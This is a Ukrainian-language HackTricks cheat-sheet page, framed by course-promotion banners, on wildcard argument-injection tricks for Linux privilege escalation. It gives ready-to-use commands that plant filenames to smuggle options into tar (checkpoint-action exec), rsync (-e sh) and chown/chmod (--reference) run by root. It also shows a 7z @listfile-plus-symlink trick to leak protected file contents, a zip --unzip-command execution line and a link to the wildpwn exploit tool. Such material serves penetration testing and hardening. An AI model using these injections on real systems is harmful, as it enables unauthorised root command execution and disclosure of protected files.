tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.
chown, chmod
Ви можете вказати, якого власника файлу та дозволи ви хочете скопіювати для решти файлів
touch "--reference=/my/own/path/filename"
Ви можете експлуатувати це, використовуючи https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (комбінована атака)
Більше інформації в https://www.exploit-db.com/papers/33930
Tar
Виконати довільні команди:
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"
Ви можете експлуатувати це, використовуючи https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar attack)
Більше інформації в https://www.exploit-db.com/papers/33930
Rsync
Виконати довільні команди:
Interesting rsync option from manual:
-e, --rsh=COMMAND specify the remote shell to use
--rsync-path=PROGRAM specify the rsync to run on remote machine
touch "-e sh shell.sh"
Ви можете експлуатувати це, використовуючи https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (_rsync _атака)
Більше інформації в https://www.exploit-db.com/papers/33930
7z
У 7z навіть використовуючи --
перед *
(зауважте, що --
означає, що наступний ввід не може бути розглянутий як параметри, тому в цьому випадку лише шляхи до файлів) ви можете викликати довільну помилку для читання файлу, тому якщо команда, подібна до наступної, виконується root:
7za a /backup/$filename.zip -t7z -snl -p$pass -- *
І ви можете створювати файли в папці, де це виконується, ви можете створити файл @root.txt
і файл root.txt
, який є symlink на файл, який ви хочете прочитати:
cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt
Тоді, коли 7z виконується, він буде розглядати root.txt
як файл, що містить список файлів, які він повинен стиснути (саме це вказує на наявність @root.txt
), і коли 7z читає root.txt
, він прочитає /file/you/want/to/read
, і оскільки вміст цього файлу не є списком файлів, він видасть помилку, показуючи вміст.
Більше інформації в Write-ups of the box CTF from HackTheBox.
Zip
Виконати довільні команди:
zip name.zip files -T --unzip-command "sh -c whoami"
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.